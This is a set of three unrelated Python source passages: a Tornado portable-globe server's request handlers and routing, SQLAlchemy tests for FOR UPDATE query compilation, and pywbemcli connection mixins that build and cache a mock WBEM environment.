layer_id = portable_globe.NON_COMPOSITE_LAYER
tornado.web.local_server_.LocalIconHandler(
self, icon_path, layer_id, use_local)
else:
self.set_header("Content-Type", "text/plain")
print "Unknown query request: ", self.request.uri
self.finish()
class QueryHandler(portable_server_base.BaseHandler):
"""Class for handling "query" requests."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for JSON file for plugin."""
if self.request.arguments["request"][0] == "Json":
if "v" in self.request.arguments:
json_version = int(self.request.arguments["v"][0])
else:
json_version = 1
self.set_header("Content-Type", "text/plain; charset=utf-8")
# TODO: Need way to distinguish 2d/3d for
# TODO: composite with both.
if ("is2d" in self.request.arguments.keys() and
self.request.arguments["is2d"][0] == "t"):
tornado.web.local_server_.LocalJsonHandler(self, True, json_version)
else:
tornado.web.local_server_.LocalJsonHandler(self, False, json_version)
elif self.request.arguments["request"][0] == "ImageryMaps":
self.set_header("Content-Type", "image/jpeg")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalMapTileHandler(
self, True, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalMapTileHandler(
self, True, portable_globe.NON_COMPOSITE_LAYER)
elif self.request.arguments["request"][0] == "VectorMapsRaster":
self.set_header("Content-Type", "image/png")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalMapTileHandler(
self, False, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalMapTileHandler(
self, False, portable_globe.NON_COMPOSITE_LAYER)
elif self.request.arguments["request"][0] == "Icon":
self.set_header("Content-Type", "image/png")
if tornado.web.globe_.IsComposite():
(icon_path, use_layer, use_local) = (
tornado.web.local_server_.ConvertIconPath(
self.request.arguments["icon_path"][0]))
if use_layer:
layer_id = portable_globe.COMPOSITE_BASE_LAYER
else:
layer_id = portable_globe.NON_COMPOSITE_LAYER
tornado.web.local_server_.LocalIconHandler(
self, icon_path, layer_id, use_local)
else:
tornado.web.local_server_.LocalIconHandler(
# Strips off "icons/" prefix from the path
self, self.request.arguments["icon_path"][0][6:],
portable_globe.NON_COMPOSITE_LAYER)
else:
self.set_header("Content-Type", "text/plain")
print "Unknown query request: ", self.request.uri
self.finish()
class MapsGen204Handler(portable_server_base.BaseHandler):
"""Class for handling /maps/gen_204 request."""
def get(self):
"""Handle GET request for gen_204 request."""
self.set_header("Content-Type", "text/plain")
# TODO: Consider parsing and storing Maps API usage.
self.finish()
class PingHandler(portable_server_base.BaseHandler):
"""Class for handling ping request to check if server is up."""
def get(self):
"""Handle GET request for ping."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalPingHandler(self)
self.finish()
class InfoHandler(portable_server_base.BaseHandler):
"""Class for getting information about current globe."""
def get(self):
"""Handle GET request for unknown path."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalInfoHandler(self)
self.finish()
def main():
"""Main for portable server."""
application = tornado.web.Application([
# Important to look for local requests first.
(r"/local/(.*)", portable_server_base.LocalDocsHandler),
(r"/ext/(.*)", portable_server_base.ExtHandler),
(r".*/(\d+)/kh/flatfile/lf-(.*)", CompositeIconHandler),
(r".*/(\d+)/kh/flatfile", CompositeFlatFileHandler),
(r".*/(\d+)/kh/dbRoot.*", CompositeDbRootHandler),
(r".*/(\d+)/kmllayer/(.*)", CompositeVectorLayerHandler),
(r".*/flatfile/lf-(.*)", IconHandler),
(r".*/flatfile", FlatFileHandler),
(r".*/dbRoot.*", DbRootHandler),
(r".*/MapsAdapter", JsonSearchHandler),
(r".*/ECV4Adapter", KmlSearchHandler),
(r".*/Portable2dPoiSearch", JsonSearchHandler),
(r".*/Portable3dPoiSearch", KmlSearchHandler),
(r".*/icons/(.*)", IconHandler),
(r"/ping", PingHandler),
(r"/info", InfoHandler),
(r".*/(\d+)/query", CompositeQueryHandler),
(r".*/query", QueryHandler),
(r".*/(\d+)/(js/.*)", CompositeDocsHandler),
(r".*/(\d+)/(kml/.*)", CompositeDocsHandler),
(r".*/(\d+)/(license/.*)", CompositeDocsHandler),
(r".*/(\d+)/(earth/.*)", CompositeDocsHandler),
(r".*/(\d+)/(maps/.*)", CompositeDocsHandler),
(r".*/(js/.*)", DocsHandler),
(r".*/(kml/.*)", DocsHandler),
(r".*/(license/.*)", DocsHandler),
(r".*/(earth/.*)", DocsHandler),
(r"/maps/gen_204", MapsGen204Handler),
(r".*/(maps/.*)", DocsHandler),
(r"/eb_balloon", BalloonHandler),
(r"/(.*)", portable_web_interface.SetUpHandler),
])
prepare_for_io_loop()
tornado.web.globe_ = portable_globe.Globe()
tornado.web.local_server_ = local_server.LocalServer()
http_server = tornado.httpserver.HTTPServer(application)
if tornado.web.globe_.config_.DisableBroadcasting():
http_server.listen(tornado.web.globe_.Port(), address="127.0.0.1")
else:
http_server.listen(tornado.web.globe_.Port())
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
|
from sqlalchemy import exc
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import mapper
from sqlalchemy.orm import relationship
from sqlalchemy.orm import Session
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import eq_
from test.orm import _fixtures
class ForUpdateTest(_fixtures.FixtureTest):
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
mapper(User, users)
def _assert(
self,
read=False,
nowait=False,
of=None,
key_share=None,
assert_q_of=None,
assert_sel_of=None,
):
User = self.classes.User
s = Session()
q = s.query(User).with_for_update(
read=read, nowait=nowait, of=of, key_share=key_share
)
sel = q._compile_context().statement
assert q._for_update_arg.read is read
assert sel._for_update_arg.read is read
assert q._for_update_arg.nowait is nowait
assert sel._for_update_arg.nowait is nowait
assert q._for_update_arg.key_share is key_share
assert sel._for_update_arg.key_share is key_share
eq_(q._for_update_arg.of, assert_q_of)
eq_(sel._for_update_arg.of, assert_sel_of)
def test_key_share(self):
self._assert(key_share=True)
def test_read(self):
self._assert(read=True)
def test_plain(self):
self._assert()
def test_nowait(self):
self._assert(nowait=True)
def test_of_single_col(self):
User, users = self.classes.User, self.tables.users
self._assert(
of=User.id, assert_q_of=[users.c.id], assert_sel_of=[users.c.id]
)
class BackendTest(_fixtures.FixtureTest):
__backend__ = True
# test against the major backends. We are naming specific databases
# here rather than using requirements rules since the behavior of
# "FOR UPDATE" as well as "OF" is very specific to each DB, and we need
# to run the query differently based on backend.
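    # For example (values taken from the compile tests further below), the
    # same ORM call renders differently per dialect:
    #   sess.query(User.id).with_for_update()
    #       -> "... FROM users FOR UPDATE"          (postgresql, oracle)
    #   sess.query(User.id).with_for_update(read=True)
    #       -> "... FROM users FOR SHARE"           (postgresql)
    #       -> "... FROM users LOCK IN SHARE MODE"  (mysql)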
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
Address, addresses = cls.classes.Address, cls.tables.addresses
mapper(User, users, properties={"addresses": relationship(Address)})
mapper(Address, addresses)
def test_inner_joinedload_w_limit(self):
User = self.classes.User
sess = Session()
q = (
sess.query(User)
.options(joinedload(User.addresses, innerjoin=True))
.with_for_update()
.limit(1)
)
if testing.against("oracle"):
assert_raises_message(exc.DatabaseError, "ORA-02014", q.all)
else:
q.all()
sess.close()
def test_inner_joinedload_wo_limit(self):
User = self.classes.User
sess = Session()
sess.query(User).options(
joinedload(User.addresses, innerjoin=True)
).with_for_update().all()
sess.close()
def test_outer_joinedload_w_limit(self):
User = self.classes.User
sess = Session()
q = sess.query(User).options(
joinedload(User.addresses, innerjoin=False)
)
if testing.against("postgresql"):
q = q.with_for_update(of=User)
else:
q = q.with_for_update()
q = q.limit(1)
if testing.against("oracle"):
assert_raises_message(exc.DatabaseError, "ORA-02014", q.all)
else:
q.all()
sess.close()
def test_outer_joinedload_wo_limit(self):
User = self.classes.User
sess = Session()
q = sess.query(User).options(
joinedload(User.addresses, innerjoin=False)
)
if testing.against("postgresql"):
q = q.with_for_update(of=User)
else:
q = q.with_for_update()
q.all()
sess.close()
def test_join_w_subquery(self):
User = self.classes.User
Address = self.classes.Address
sess = Session()
q1 = sess.query(User).with_for_update().subquery()
sess.query(q1).join(Address).all()
sess.close()
def test_plain(self):
User = self.classes.User
sess = Session()
sess.query(User).with_for_update().all()
sess.close()
class CompileTest(_fixtures.FixtureTest, AssertsCompiledSQL):
"""run some compile tests, even though these are redundant."""
run_inserts = None
@classmethod
def setup_mappers(cls):
User, users = cls.classes.User, cls.tables.users
Address, addresses = cls.classes.Address, cls.tables.addresses
mapper(User, users, properties={"addresses": relationship(Address)})
mapper(Address, addresses)
def test_default_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect=default.DefaultDialect(),
)
def test_not_supported_by_dialect_should_just_use_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect=default.DefaultDialect(),
)
def test_postgres_read(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True),
"SELECT users.id AS users_id FROM users FOR SHARE",
dialect="postgresql",
)
def test_postgres_read_nowait(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True, nowait=True),
"SELECT users.id AS users_id FROM users FOR SHARE NOWAIT",
dialect="postgresql",
)
def test_postgres_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect="postgresql",
)
def test_postgres_update_of(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(of=User.id),
"SELECT users.id AS users_id FROM users FOR UPDATE OF users",
dialect="postgresql",
)
def test_postgres_update_of_entity(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(of=User),
"SELECT users.id AS users_id FROM users FOR UPDATE OF users",
dialect="postgresql",
)
def test_postgres_update_of_entity_list(self):
User = self.classes.User
Address = self.classes.Address
sess = Session()
self.assert_compile(
sess.query(User.id, Address.id).with_for_update(
of=[User, Address]
),
"SELECT users.id AS users_id, addresses.id AS addresses_id "
"FROM users, addresses FOR UPDATE OF users, addresses",
dialect="postgresql",
)
def test_postgres_for_no_key_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(key_share=True),
"SELECT users.id AS users_id FROM users FOR NO KEY UPDATE",
dialect="postgresql",
)
def test_postgres_for_no_key_nowait_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(key_share=True, nowait=True),
"SELECT users.id AS users_id FROM users FOR NO KEY UPDATE NOWAIT",
dialect="postgresql",
)
def test_postgres_update_of_list(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(
of=[User.id, User.id, User.id]
),
"SELECT users.id AS users_id FROM users FOR UPDATE OF users",
dialect="postgresql",
)
def test_postgres_update_skip_locked(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(skip_locked=True),
"SELECT users.id AS users_id FROM users FOR UPDATE SKIP LOCKED",
dialect="postgresql",
)
def test_oracle_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect="oracle",
)
def test_oracle_update_skip_locked(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(skip_locked=True),
"SELECT users.id AS users_id FROM users FOR UPDATE SKIP LOCKED",
dialect="oracle",
)
def test_mysql_read(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True),
"SELECT users.id AS users_id FROM users LOCK IN SHARE MODE",
dialect="mysql",
)
def test_for_update_on_inner_w_joinedload(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User)
.options(joinedload(User.addresses))
.with_for_update()
.limit(1),
"SELECT anon_1.users_id AS anon_1_users_id, anon_1.users_name "
"AS anon_1_users_name, addresses_1.id AS addresses_1_id, "
"addresses_1.user_id AS addresses_1_user_id, "
"addresses_1.email_address AS addresses_1_email_address "
"FROM (SELECT users.id AS users_id, users.name AS users_name "
"FROM users LIMIT %s FOR UPDATE) AS anon_1 "
"LEFT OUTER JOIN addresses AS addresses_1 "
"ON anon_1.users_id = addresses_1.user_id FOR UPDATE",
dialect="mysql",
)
def test_for_update_on_inner_w_joinedload_no_render_oracle(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User)
.options(joinedload(User.addresses))
.with_for_update()
.limit(1),
"SELECT anon_1.users_id AS anon_1_users_id, "
"anon_1.users_name AS anon_1_users_name, "
"addresses_1.id AS addresses_1_id, "
"addresses_1.user_id AS addresses_1_user_id, "
"addresses_1.email_address AS addresses_1_email_address "
"FROM (SELECT anon_2.users_id AS users_id, "
"anon_2.users_name AS users_name FROM "
"(SELECT users.id AS users_id, users.name AS users_name "
"FROM users) anon_2 WHERE ROWNUM <= [POSTCOMPILE_param_1]) anon_1 "
"LEFT OUTER JOIN addresses addresses_1 "
"ON anon_1.users_id = addresses_1.user_id FOR UPDATE",
dialect="oracle",
)
|
|
# (C) Copyright 2017 IBM Corp.
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Mixin class that adds methods to WBEMConnection and FakeWBEMConnection for
pywbemcli usage
This contains only methods that use the iter<...> operations but also execute
the complete iterations so that we can use these as common operations for
pywbemcli instead of having to execute an algorithm of pull vs non-pull
everywhere a possible WBEMConnection pull operation is called.
It also adds a method to FakeWBEMConnection to build the repository.
"""
from __future__ import absolute_import, print_function
import os
import io
import errno
import glob
import hashlib
import pickle
import click
import packaging.version
import pywbem
import pywbem_mock
from .config import DEFAULT_MAXPULLCNT
from .._utils import ensure_bytes, ensure_unicode, DEFAULT_CONNECTIONS_FILE
from . import mockscripts
PYWBEM_VERSION = packaging.version.parse(pywbem.__version__)
# __all__ = ['PYWBEMCLIConnection', 'PYWBEMCLIFakedConnection']
# pylint: disable=useless-object-inheritance
class PYWBEMCLIConnectionMixin(object):
"""
Mixin class to extend WBEMConnection with a set of methods that use the
iter<...> methods as the basis for getting Instances, etc. but add the
generator processing to retrieve the instances. These can be used within
    pywbemcli to allow one method call to act as either a pull or traditional
    operation, pushing the differences into this mixin.
These methods do not resolve the core issues between the traditional and
pull operations such as the fact that only the pull operations pass
the FilterQuery parameter.
    They are a pywbemcli convenience to simplify the individual action
    processing methods to a single call.
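    Example (an illustrative sketch; the URL and the CIM class name are
    hypothetical):
        conn = PYWBEMCLIConnection('http://localhost')
        instances = conn.PyWbemcliEnumerateInstances('CIM_ComputerSystem')
        paths = conn.PyWbemcliEnumerateInstancePaths('CIM_ComputerSystem')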
"""
def PyWbemcliEnumerateInstancePaths(self, ClassName, namespace=None,
FilterQueryLanguage=None,
FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
        Execute IterEnumerateInstancePaths and retrieve the instance paths.
        Returns the resulting instance paths.
Uses the same parameters as the IterEnumerateInstancePaths method.
All exceptions from the underlying command are passed through this
method.
"""
result = self.IterEnumerateInstancePaths(
ClassName,
namespace=namespace,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliEnumerateInstances(self, ClassName, namespace=None,
LocalOnly=None,
DeepInheritance=None,
IncludeQualifiers=None,
IncludeClassOrigin=None, PropertyList=None,
FilterQueryLanguage=None, FilterQuery=None,
OperationTimeout=None, ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
        Execute IterEnumerateInstances and retrieve the instances. Returns
        the resulting instances.
Uses the same parameters as the IterEnumerateInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterEnumerateInstances(
ClassName,
namespace=namespace,
LocalOnly=LocalOnly,
DeepInheritance=DeepInheritance,
IncludeQualifiers=IncludeQualifiers,
IncludeClassOrigin=IncludeClassOrigin,
PropertyList=PropertyList,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliReferenceInstancePaths(self, InstanceName, ResultClass=None,
Role=None,
FilterQueryLanguage=None,
FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
        Execute IterReferenceInstancePaths and retrieve the paths. Returns
        the paths that result from iterating the IterReferenceInstancePaths.
        Uses the same parameters as the IterReferenceInstancePaths method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterReferenceInstancePaths(
InstanceName,
ResultClass=ResultClass,
Role=Role,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliReferenceInstances(self, InstanceName, ResultClass=None,
Role=None, IncludeQualifiers=None,
IncludeClassOrigin=None, PropertyList=None,
FilterQueryLanguage=None, FilterQuery=None,
OperationTimeout=None, ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
        Execute IterReferenceInstances and retrieve the instances. Returns
        the resulting instances.
        Uses the same parameters as the IterReferenceInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterReferenceInstances(
InstanceName,
ResultClass=ResultClass,
Role=Role,
IncludeQualifiers=IncludeQualifiers,
IncludeClassOrigin=IncludeClassOrigin,
PropertyList=PropertyList,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliAssociatorInstancePaths(self, InstanceName, AssocClass=None,
ResultClass=None,
Role=None, ResultRole=None,
FilterQueryLanguage=None,
FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterAssociatorInstancePaths and retrieve the paths. Returns
the paths that result from iterating the IterAssociatorInstancePaths.
Uses the same parameters as the IterAssociatorInstancePaths method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterAssociatorInstancePaths(
InstanceName,
AssocClass=AssocClass,
ResultClass=ResultClass,
Role=Role,
ResultRole=ResultRole,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliAssociatorInstances(self, InstanceName, AssocClass=None,
ResultClass=None,
Role=None, ResultRole=None,
IncludeQualifiers=None,
IncludeClassOrigin=None, PropertyList=None,
FilterQueryLanguage=None, FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterAssociatorInstances and retrieve the instances. Returns
the instances that result from iterating the IterAssociatorInstances.
Uses the same parameters as the IterAssociatorInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterAssociatorInstances(
InstanceName,
AssocClass=AssocClass,
ResultClass=ResultClass,
Role=Role,
ResultRole=ResultRole,
IncludeQualifiers=IncludeQualifiers,
IncludeClassOrigin=IncludeClassOrigin,
PropertyList=PropertyList,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliQueryInstances(self, FilterQueryLanguage, FilterQuery,
namespace=None, ReturnQueryResultClass=None,
OperationTimeout=None, ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterQueryInstances and retrieve the instances. Returns
the instances that result from iterating the IterQueryInstances.
Uses the same parameters as the IterQueryInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterQueryInstances(
FilterQueryLanguage,
FilterQuery,
namespace=namespace,
ReturnQueryResultClass=ReturnQueryResultClass,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
class BuildMockenvMixin(object):
# pylint: disable=too-few-public-methods
"""
Mixin class for pywbem_mock.FakedWBEMConnection that adds the ability to
build the mock environment of a connection from a connection definition in
a connections file.
"""
def build_mockenv(self, server, file_path_list, connections_file,
connection_name, verbose):
"""
Builds the mock environment of the 'self' connection from the input
files, or from the mock cache of the connection if it is up to date.
If the mock environment was built from the input files, the mock
environment of the connection is dumped to its cache.
The input files for building the mock environment are:
* MOF files with a suffix of '.mof'.
These files are compiled into the default namespace of the connection.
* Python files with a suffix of '.py'.
These files are mock scripts that are imported and thereby executed.
The mock scripts can be used for any kind of setup of the mock
environment, for example for creating namespaces, for defining
provider classes and registering providers, or for adding CIM objects
either directly through add_cimobjects() or by compiling MOF files.
Mock scripts support two approaches for passing the connection and
server objects they should operate on:
* via a setup() function defined in the mock script. This is the
recommended approach, and it supports caching. The setup()
function has the following parameters:
conn (pywbem_mock.FakedWBEMConnection): The mock connection.
server (pywbem.WBEMServer): The server object for the mock
connection.
verbose (bool): Verbose flag from the command line.
* via global variables made available to the mock script. This
approach prevents caching. The following global variables are
made available:
CONN (pywbem_mock.FakedWBEMConnection): The mock connection.
SERVER (pywbem.WBEMServer): The server object for the mock
connection.
VERBOSE (bool): Verbose flag from the command line.
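        A minimal mock script using the recommended setup() approach might
        look like this (an illustrative sketch; the MOF content is
        hypothetical):
            def setup(conn, server, verbose):
                # conn is the FakedWBEMConnection for this mock environment
                conn.compile_mof_string(
                    'class CIM_Foo { string InstanceID; };')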
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
server (pywbem.WBEMServer): The server object for the mock connection.
file_path_list (list of string): The path names of the input files
for building the mock environment, from the connection definition.
connections_file (string): Path name of the connections file.
connection_name (string): The name of the connection definition in
the connections file.
verbose (bool): Verbose flag from the command line.
Raises:
MockFileError: Mock file does not exist.
MockMOFCompileError: Mock MOF file fails to compile.
MockScriptError: Mock script fails to execute.
SetupNotSupportedError (py<3.5): New-style setup in mock script not
supported.
"""
# Check that the input files exist. Since we loop through them multiple
# times, we check that once.
for file_path in file_path_list:
if not os.path.exists(file_path):
raise mockscripts.MockFileError(
"Mock file does not exist: {}".format(file_path))
# The connections file is set if a named connection is used, i.e.
# when specifying the -n general option. It is not set when the -s or -m
# general options were specified. When no connections file is set, no
# caching happens because there is no connection definition context
# which is required for caching.
if connections_file == DEFAULT_CONNECTIONS_FILE:
cache_rootdir = mockcache_rootdir()
if not os.path.isdir(cache_rootdir):
os.mkdir(cache_rootdir)
cache_dir = mockcache_cachedir(
cache_rootdir, connections_file, connection_name)
if not os.path.isdir(cache_dir):
os.mkdir(cache_dir)
# The mockenv pickle file contains the pickled state of the mock
# environment.
mockenv_pickle_file = os.path.join(cache_dir, 'mockenv.pkl')
# The depreg pickle file contains the provider dependents
# registry of the connection. It is used to look up the dependent
# files of a mock script. The content of these dependent files is
# also taken into account when determining whether the cache is up
# to date. This needs to go into a separate pickle file because
            # it needs to be loaded and examined before the mockenv pickle
            # file is loaded.
depreg_pickle_file = os.path.join(cache_dir, 'depreg.pkl')
# The md5 file contains the MD5 hash value of the content of the
# input files for the mock environment, and also taken into account
# when determining whether the cache is up to date.
md5_file = os.path.join(cache_dir, 'mockfiles.md5')
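            # The resulting cache layout is, for example (illustrative; the
            # hash and connection name depend on the connections file path
            # and the connection definition name):
            #   ~/.pywbemcli_mockcache/6048a3da1a34a3ec605825a1493c7bb5.simple/
            #       mockenv.pkl     - pickled CIM repository and provider registry
            #       depreg.pkl      - pickled provider dependent registry
            #       mockfiles.md5   - MD5 hash of the mock input file content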
# Flag indicating that the mock environment needs to be built
# (or re-built). If False, the mock environment cache can be used.
need_rebuild = False
# Determine whether the mock environment needs to be rebuilt based
# on the (non-)existence of the cache files.
if not os.path.isfile(mockenv_pickle_file) \
or not os.path.isfile(depreg_pickle_file) \
or not os.path.isfile(md5_file):
if verbose:
click.echo("Mock environment for connection definition "
"'{}' will be built because it was not cached.".
format(connection_name))
need_rebuild = True
try:
depreg = self._load_depreg(depreg_pickle_file)
except (IOError, OSError) as exc:
if exc.errno == errno.ENOENT:
depreg = pywbem_mock.ProviderDependentRegistry()
else:
raise
# Calculate the MD5 hash value of the content of the input files
md5 = hashlib.md5()
for file_path in file_path_list:
with io.open(file_path, 'rb') as fp:
file_source = fp.read()
md5.update(file_source)
# For mock scripts, take their dependent files into account
if file_path.endswith('.py'):
dep_files = depreg.iter_dependents(file_path)
for dep_file in dep_files:
with io.open(dep_file, 'rb') as fp:
file_source = fp.read()
md5.update(file_source)
# Add the cache dir, so that manual tweaks on the cache files
# invalidates the cache.
md5.update(ensure_bytes(cache_dir))
new_md5_value = ensure_unicode(md5.hexdigest())
# Determine whether the mock environment needs to be rebuilt based
# on the MD5 hash value of the input file content.
if not need_rebuild:
with io.open(md5_file, 'r', encoding='utf-8') as fp:
cached_md5_value = fp.read()
if new_md5_value != cached_md5_value:
if verbose:
click.echo("Mock environment for connection "
"definition '{}' is cached but will be "
"rebuilt because the mock files have "
"changed.".format(connection_name))
need_rebuild = True
cache_it = True
elif connections_file:
# User-specified connections file used.
if verbose:
click.echo("Mock environment for connection definition '{}' "
"will be built because user-specified connections "
"files are not cached.".format(connection_name))
need_rebuild = True
cache_it = False
else:
# No connections file context.
if verbose:
click.echo("Mock environment for connection definition '{}' "
"will be built because no connections file is "
"known.".format(connection_name))
need_rebuild = True
cache_it = False
if need_rebuild:
try:
self._build_mockenv(server, file_path_list, verbose)
except mockscripts.NotCacheable as exc:
if verbose:
click.echo("Mock environment for connection definition "
"'{}' will be built because it is not "
"cacheable: {}.".format(connection_name, exc))
else:
if connections_file and cache_it:
self._dump_mockenv(mockenv_pickle_file)
self._dump_depreg(
self.provider_dependent_registry, depreg_pickle_file)
with io.open(md5_file, 'w', encoding='utf-8') as fp:
fp.write(new_md5_value)
if verbose:
click.echo("Mock environment for connection "
"definition '{}' has been written to "
"cache.".format(connection_name))
else:
# When no rebuild is needed, there must have been a connections
# file set.
assert connections_file
try:
self._load_mockenv(mockenv_pickle_file, file_path_list)
if verbose:
click.echo("Mock environment for connection definition "
"'{}' has been loaded from cache.".
format(connection_name))
except mockscripts.NotCacheable as exc:
if verbose:
click.echo("Mock environment for connection definition "
"'{}' will be rebuilt because it is not "
"cacheable: {}.".format(connection_name, exc))
self._build_mockenv(server, file_path_list, verbose)
def _build_mockenv(self, server, file_path_list, verbose):
"""
Build the mock environment from the input files.
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
server (pywbem.WBEMServer): The server object for the mock connection.
file_path_list (list of string): The path names of the input files
for building the mock environment, from the connection definition.
verbose (bool): Verbose flag from the command line.
Raises:
NotCacheable (py<3.5): Mock environment is not cacheable.
MockMOFCompileError: Mock MOF file fails to compile.
MockScriptError: Mock script fails to execute.
SetupNotSupportedError (py<3.5): New-style setup in mock script not
supported.
"""
for file_path in file_path_list:
ext = os.path.splitext(file_path)[1]
if ext == '.mof':
try:
# Displays any MOFParseError already
self.compile_mof_file(file_path, verbose=verbose)
except pywbem.Error as er:
# Abort the entire pywbemcli command because the
# MOF compilation might have caused inconsistencies in
# the mock repository.
if PYWBEM_VERSION.release >= (1, 0, 0):
# display just the exception.
msg = "MOF compile failed:\n{0}".format(er)
else:
# display file name. Error text displayed already.
if isinstance(er, pywbem.MOFParseError):
msg = "MOF compile failed: File: '{0}'" \
"(see above)".format(file_path)
else: # not parse error, display exception
msg = "MOF compile failed: File: {0} " \
"Error: {1}".format(file_path, er)
new_exc = mockscripts.MockMOFCompileError(msg)
new_exc.__cause__ = None
raise new_exc
else:
assert ext == '.py' # already checked
# May raise various mockscripts.MockError exceptions.
# NotCacheable will be handled by the caller by building the
# mock env.
mockscripts.setup_script(file_path, self, server, verbose)
def _dump_mockenv(self, mockenv_pickle_file):
"""
Dump the mock environment of the connection to the mockenv pickle file.
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
        mockenv_pickle_file (string): Path name of the mockenv
pickle file.
"""
# Save the provider registry and the CIM repository
# We construct a single object, because the CIM repository is
# referenced from each provider, and pickle properly handles
# multiple references to the same object.
mockenv = dict(
cimrepository=self.cimrepository,
# pylint: disable=protected-access
provider_registry=self._provider_registry,
)
with io.open(mockenv_pickle_file, 'wb') as fp:
pickle.dump(mockenv, fp)
def _load_mockenv(self, mockenv_pickle_file, file_path_list):
"""
Load the mock environment from the mockenv pickle file.
This method also imports the Python scripts from the input files in
order to re-establish any class definitions that may be needed, for
example provider classes.
Parameters:
